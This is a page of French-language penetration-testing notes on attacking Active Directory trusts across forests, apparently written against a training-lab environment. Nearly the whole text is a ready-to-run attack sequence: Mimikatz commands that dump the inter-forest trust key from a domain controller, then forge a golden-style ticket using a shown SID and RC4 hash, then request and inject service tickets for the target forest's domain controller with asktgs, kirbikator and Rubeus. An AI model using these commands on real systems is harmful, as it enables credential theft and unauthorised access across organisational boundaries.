Across Forest

2/ Across Forest

Même methodologie que pour abuser des cross domain trust :

On demande la Trust Key :

Invoke-Mimikatz -Command '"lsadump::trust /patch"' # A faire depuis le DC
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

Creation d'un TGT inter-Forest :

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /rc4:0fd0741334bd0ef966f87094f10cc522 /service:krbtgt /target:eurocorp.local /ticket:trust_forest_tkt.kirbi"'

Avec Mimikatz :

Demande d'un TGS pour un service ciblé dans la Forest :

.\\asktgs.exe trust_forest_tkt.kirbi CIFS/eurocorp-dc.eurocorp.local

On load ensuite les TGS en mémoire :

.\\kirbikator.exe lsa .\\CIFS.eurocorp-dc.eurocorp.local.kirbi

Avec Rubeus :

.\\Rubeus.exe asktgs /ticket:trust_forest_tkt.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt
PreviousAcross DomainNextReferences

Last updated